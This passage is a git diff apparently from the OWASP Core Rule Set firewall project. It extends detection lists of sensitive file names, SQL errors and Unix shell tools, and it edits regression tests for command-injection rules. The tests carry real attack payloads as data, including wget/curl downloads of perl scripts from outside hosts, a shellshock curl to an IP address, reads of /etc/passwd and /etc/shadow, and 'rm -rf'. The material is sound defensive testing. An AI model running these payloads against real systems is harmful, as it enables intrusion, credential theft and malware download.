-settings.php
+settings.inc.php
 settings.local.php
-local.xml
-.env
+settings.php
+sftp-config.json
+slabinfo
+soapConfig.xml
+softirqs
+sslvpn_websession
+sysrq-trigger
+sysvipc
+thread-self
+timer_list
+timer_stats
+tsconfig.json
+version_signature
+vmallocinfo
+vmstat
+weblogic.xml
+webpack.config.js
+wp-config.bak
+wp-config.old
+wp-config.php
+wp-config.temp
+wp-config.tmp
+wp-config.txt
+yarn.lock
+zoneinfo
diff --git a/rules/@owasp_crs/sql-errors.data b/rules/@owasp_crs/sql-errors.data
index c2a544c..e37f7a6 100644
--- a/rules/@owasp_crs/sql-errors.data
+++ b/rules/@owasp_crs/sql-errors.data
@@ -167,3 +167,6 @@ SQ200: No table
 Virtuoso S0002 Error
 [Virtuoso Driver][Virtuoso Server]
 [Virtuoso iODBC Driver][Virtuoso Server]
+Conversion failed when converting the varchar value
+invalid input syntax for integer:
+XPATH syntax error:
diff --git a/rules/@owasp_crs/unix-shell.data b/rules/@owasp_crs/unix-shell.data
index d06bb26..64e2762 100644
--- a/rules/@owasp_crs/unix-shell.data
+++ b/rules/@owasp_crs/unix-shell.data
@@ -16,6 +16,7 @@ ${OLDPWD}
 ${OSTYPE}
 ${PATH}
 ${PWD}
+${SHELL}
 $CDPATH
 $DIRSTACK
 $HOME
@@ -25,11 +26,13 @@ $OLDPWD
 $OSTYPE
 $PATH
 $PWD
+$SHELL
 bin/7z
 bin/7za
 bin/7zr
 bin/7zx
 bin/ab
+bin/addgroup
 bin/adduser
 bin/agetty
 bin/alias
@@ -37,6 +40,7 @@ bin/alpine
 bin/ansible-playbook
 bin/apt
 bin/apt-get
+bin/aptitude
 bin/ar
 bin/arch
 bin/aria2c
@@ -50,12 +54,15 @@ bin/aspell
 bin/at
 bin/atobm
 bin/awk
+bin/axel
 bin/aws
 bin/base32
 bin/base64
+bin/basename
 bin/basenc
 bin/bash
 bin/batch
+bin/blkid
 bin/bpftrace
 bin/breaksw
 bin/bridge
@@ -68,6 +75,7 @@ bin/bunzip2
 bin/busctl
 bin/busybox
 bin/byebug
+bin/byobu
 bin/bzcat
 bin/bzcmp
 bin/bzdiff
@@ -97,10 +105,14 @@ bin/check_raid
 bin/check_ssl_cert
 bin/check_statusfile
 bin/chflags
+bin/chgrp
 bin/chmod
 bin/choom
 bin/chown
+bin/chpass
+bin/chgpasswd
 bin/chroot
+bin/chsh
 bin/clang
 bin/clang++
 bin/cmp
@@ -119,6 +131,7 @@ bin/cpan
 bin/cpio
 bin/cpulimit
 bin/crash
+bin/cron
 bin/crontab
 bin/csh
 bin/csplit
@@ -128,11 +141,13 @@ bin/curl
 bin/cut
 bin/dash
 bin/date
+bin/df
 bin/dd
 bin/dhclient
 bin/dialog
 bin/diff
 bin/dig
+bin/dir
 bin/dmesg
 bin/dmidecode
 bin/dmsetup
@@ -144,6 +159,7 @@ bin/dosbox
 bin/dpkg
 bin/du
 bin/dvips
+bin/e2fsck
 bin/easy_install
 bin/eb
 bin/echo
@@ -170,6 +186,7 @@ bin/expr
 bin/facter
 bin/fc
 bin/fetch
+bin/fg
 bin/fgrep
 bin/fi
 bin/file
@@ -194,6 +211,8 @@ bin/gem
 bin/genie
 bin/genisoimage
 bin/GET
+bin/HEAD
+bin/POST
 bin/getfacl
 bin/ghc
 bin/ghci
@@ -201,13 +220,16 @@ bin/gimp
 bin/ginsh
 bin/git
 bin/go
+bin/gpg
 bin/grc
 bin/grep
+bin/groupmod
 bin/gtester
 bin/gunzip
 bin/gzcat
 bin/gzexe
 bin/gzip
+bin/hash
 bin/hd
 bin/head
 bin/hexdump
@@ -217,6 +239,7 @@ bin/hostid
 bin/hostname
 bin/hping3
 bin/htdigest
+bin/htop
 bin/htpasswd
 bin/hup
 bin/iconv
@@ -266,6 +289,7 @@ bin/loginctl
 bin/logname
 bin/logsave
 bin/look
+bin/losetup
 bin/lp
 bin/ls
 bin/ls-F
@@ -309,6 +333,7 @@ bin/mawk
 bin/mkdir
 bin/mkfifo
 bin/mknod
+bin/mktemp
 bin/mlocate
 bin/more
 bin/mosquitto
@@ -339,6 +364,7 @@ bin/neofetch
 bin/net
 bin/netcat
 bin/netkit-ftp
+bin/netplan
 bin/netstat
 bin/nice
 bin/nl
@@ -359,6 +385,8 @@ bin/openssl
 bin/openvpn
 bin/openvt
 bin/opkg
+bin/pacman
+bin/parted
 bin/passwd
 bin/paste
 bin/patch
@@ -406,6 +434,7 @@ bin/ptargrep
 bin/ptx
 bin/puppet
 bin/pushd
+bin/pwd
 bin/pxz
 bin/python
 bin/python2
@@ -530,6 +559,7 @@ bin/unshare
 bin/unxz
 bin/unzip
 bin/unzstd
+bin/up2date
 bin/update-alternatives
 bin/useradd
 bin/userdel
@@ -545,6 +575,7 @@ bin/vimdiff
 bin/vipw
 bin/virsh
 bin/volatility
+bin/w
 bin/w3m
 bin/wall
 bin/watch
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml
index e4c55a0..4994b03 100644
--- a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml
@@ -131,3 +131,37 @@ tests:
             protocol: "http"
           output:
             log_contains: "id \"932160\""
+  - test_title: 932160-9
+    desc: "Positive test: Unix Command Injection - $SHELL test"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+            method: GET
+            port: 80
+            # code=$SHELL -c "echo hi"
+            uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22"
+            version: HTTP/1.0
+          output:
+            log_contains: id "932160"
+  - test_title: 932160-10
+    desc: "Positive test: Unix Command Injection - ${SHELL} test"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: "localhost"
+              User-Agent: "OWASP CRS test agent"
+            method: GET
+            port: 80
+            # code=${SHELL} -c "echo hi"
+            uri: /get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22
+            version: HTTP/1.0
+          output:
+            log_contains: id "932160"
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
index 47d5d1f..7568093 100644
--- a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
@@ -280,3 +280,37 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932200"
+  - test_title: 932200-18
+    desc: False positive test against query string and space in a parameter
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "http://www.example.com/page?param=test+test"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            no_log_contains: id "932200"
+  - test_title: 932200-19
+    desc: False positive test against query string and space in path
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "http://www.example.com/page%20test?param=test"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            no_log_contains: id "932200"
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml
new file mode 100644
index 0000000..433acef
--- /dev/null
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml
@@ -0,0 +1,92 @@
+---
+meta:
+  author: "Max Leske"
+  description: RCE Bypass
+  enabled: true
+  name: 932205.yaml
+tests:
+  - test_title: 932205-1
+    desc: Referer without query string, trying to evade query string match
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "www.google.com;c$?at+/etc/passwd"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            log_contains: id "932205"
+  - test_title: 932205-2
+    desc: Referer header with query string and obvious payload
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "www.google.com?param=;/bin/ca?+/et*/passwd"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            log_contains: id "932205"
+  - test_title: 932205-3
+    desc: Referer header with canonical path, query string and obvious payload
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "www.google.com/?param=;/bin/ca?+/et*/passwd"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            log_contains: id "932205"
+  - test_title: 932205-4
+    desc: False positive test against query string and space in a parameter
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "http://www.example.com/page?param=test+test"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            no_log_contains: id "932205"
+  - test_title: 932205-5
+    desc: False positive test against query string and space in path
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "http://www.example.com/page%20test?param=test"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            no_log_contains: id "932205"
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml
new file mode 100644
index 0000000..bebf2d6
--- /dev/null
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml
@@ -0,0 +1,58 @@
+---
+meta:
+  author: "Max Leske"
+  description: RCE Bypass
+  enabled: true
+  name: 932206.yaml
+tests:
+  - test_title: 932206-1
+    desc: Referer header without URL
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "/bin/ca't'+/et*/passwd"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            log_contains: id "932206"
+  - test_title: 932206-2
+    desc: False positive test against URL
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "http://www.example.com/page?param=test+test"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            no_log_contains: id "932206"
+  - test_title: 932206-3
+    desc: False positive test against query string and space in path
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: "http://www.example.com/page%20test?param=test"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            no_log_contains: id "932206"
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml
index af0fa0a..ba9cfe2 100644
--- a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml
@@ -24,7 +24,7 @@ tests:
             uri: /?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-2
     desc: System Command Injection (932230) from old modsec regressions
     stages:
@@ -44,7 +44,7 @@ tests:
             uri: /?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-3
     desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities
     stages:
@@ -144,7 +144,7 @@ tests:
             data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-8
     desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked
     stages:
@@ -164,7 +164,7 @@ tests:
             data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-9
     desc: Positive test - RCE passed in one of the args
     stages:
@@ -185,7 +185,7 @@ tests:
               arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-10
     desc: RCE from test 932230.yaml combined with html entities in the middle
     stages:
@@ -205,7 +205,7 @@ tests:
             data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-11
     desc: RCE from test 932230.yaml combined with html entities at the beginning
     stages:
@@ -225,7 +225,7 @@ tests:
             data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-12
     desc: RCE from test 932230.yaml combined with html entities at the end
     stages:
@@ -245,7 +245,7 @@ tests:
             data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-13
     desc: RCE from https://github.com/payloadbox/command-injection-payload-list and html entities
     stages:
@@ -285,7 +285,7 @@ tests:
             data: "arg=&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-15
     desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities
     stages:
@@ -305,7 +305,7 @@ tests:
             data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-16
     desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities
     stages:
@@ -325,7 +325,7 @@ tests:
             data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-17
     desc: RCE ;top with html entities two digit decimal of 59 (;)
     stages:
@@ -345,7 +345,7 @@ tests:
             data: "arg=%26%2359%3B+;top"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-18
     desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end
     stages:
@@ -365,7 +365,7 @@ tests:
             data: "arg=&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-19
     desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning
     stages:
@@ -385,7 +385,7 @@ tests:
             data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-20
     desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end
     stages:
@@ -405,7 +405,7 @@ tests:
             data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-21
     desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning
     stages:
@@ -425,7 +425,7 @@ tests:
             data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-22
     desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the end
     stages:
@@ -465,7 +465,7 @@ tests:
             data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\""
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-24
     desc: RCE in arg and html entity is sent in cookie
     stages:
@@ -524,7 +524,7 @@ tests:
             data: "var=` /bin/cat /etc/passwd`"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-27
     desc: "Unix command injection"
     stages:
@@ -541,7 +541,7 @@ tests:
             data: "var=`cut crs312``dig 34test`"
             version: HTTP/1.1
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-28
     desc: Test RCE with new semantic versions - ;gcc10.1
     stages:
@@ -727,7 +727,7 @@ tests:
               code=;c89 -wrapper sh,-c,id .
             version: HTTP/1.0
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-38
     desc: "55O5COJ5"
     stages:
@@ -745,7 +745,7 @@ tests:
               code=;c89 -wrapper sh,-c,curl\ google.com .
             version: HTTP/1.0
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-39
     desc: "9323HNQU"
     stages:
@@ -763,7 +763,7 @@ tests:
               code=;vi dddd +silent\\ \!whoami +wq
             version: HTTP/1.0
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-40
     desc: "9323HNQU"
     stages:
@@ -781,7 +781,7 @@ tests:
               code=;vim dddd +silent\\ \!whoami +wq
             version: HTTP/1.0
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-41
     desc: "9323HNQU"
     stages:
@@ -799,7 +799,7 @@ tests:
               code=;ex dddd +silent\\ \!whoami +wq
             version: HTTP/1.0
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-42
     desc: "9323HNQU"
     stages:
@@ -817,7 +817,7 @@ tests:
               code=;vi -c:\!pwd
             version: HTTP/1.0
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-43
     desc: "9323HNQU"
     stages:
@@ -835,7 +835,7 @@ tests:
               code=;vim -c:\!pwd
             version: HTTP/1.0
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-44
     desc: "9323HNQU"
     stages:
@@ -853,7 +853,7 @@ tests:
               code=;ex -c:\!pwd
             version: HTTP/1.0
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-45
     desc: "ATFHUJVF"
     stages:
@@ -871,7 +871,7 @@ tests:
               code=;gdb -nx -ex \!whoami -ex quit
             version: HTTP/1.0
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
   - test_title: 932230-46
     desc: "JW2SU88A"
     stages:
@@ -889,4 +889,4 @@ tests:
             data: |
               code=;cat /path/file.gz
           output:
-            log_contains: id "932230"
+            no_log_contains: id "932230"
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
index f05b35e..bcb8e64 100644
--- a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
@@ -10,175 +10,6 @@ meta:
   name: 932236.yaml
 tests:
   - test_title: 932236-1
-    desc: "Unix RCE in request headers"
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
-              Host: localhost
-              User-Agent: ";chmod +x evil.php"
-            method: GET
-            port: 80
-            uri: /
-            version: HTTP/1.0
-          output:
-            log_contains: id "932236"
-  - test_title: 932236-2
-    desc: "Unix RCE in request headers - uppercase"
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
-              Host: localhost
-              User-Agent: ";CHMOD +X EVIL.PHP"
-            method: GET
-            port: 80
-            uri: /
-            version: HTTP/1.0
-          output:
-            log_contains: id "932236"
-  - test_title: 932236-3
-    desc: System Command Injection (932236) from old modsec regressions
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-              Accept-Encoding: gzip,deflate
-              Accept-Language: en-us,en;q=0.5
-              Host: localhost
-              Keep-Alive: '300'
-              Proxy-Connection: keep-alive
-              User-Agent: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf
-            method: GET
-            port: 80
-            uri: /get
-            version: HTTP/1.1
-          output:
-            log_contains: id "932236"
-  - test_title: 932236-4
-    desc: System Command Injection (932236) from old modsec regressions
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-              Accept-Encoding: gzip,deflate
-              Accept-Language: en-us,en;q=0.5
-              Host: localhost
-              Keep-Alive: '300'
-              Proxy-Connection: keep-alive
-              User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php
-            method: GET
-            port: 80
-            uri: /get
-            version: HTTP/1.1
-          output:
-            log_contains: id "932236"
-  - test_title: 932236-5
-    desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: Something true positive &#8222;The Title&#8221;. After space or new line more characters
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-              Accept-Encoding: gzip, deflate, br
-              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
-              Content-Type: application/x-www-form-urlencoded
-            method: POST
-            port: 80
-            uri: /post
-            version: HTTP/1.1
-          output:
-            no_log_contains: id "932236"
-  - test_title: 932236-6
-    desc: System Command Injection (932236) from old modsec regressions
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-              Accept-Encoding: gzip,deflate
-              Accept-Language: en-us,en;q=0.5
-              Host: localhost
-              Keep-Alive: '300'
-              Proxy-Connection: keep-alive
-              User-Agent: "OWASP CRS test agent"
-              Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf
-            method: GET
-            port: 80
-            uri: /get
-            version: HTTP/1.1
-          output:
-            log_contains: id "932236"
-  - test_title: 932236-7
-    desc: System Command Injection (932236) from old modsec regressions
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-              Accept-Encoding: gzip,deflate
-              Accept-Language: en-us,en;q=0.5
-              Host: localhost
-              Keep-Alive: '300'
-              Proxy-Connection: keep-alive
-              User-Agent: "OWASP CRS test agent"
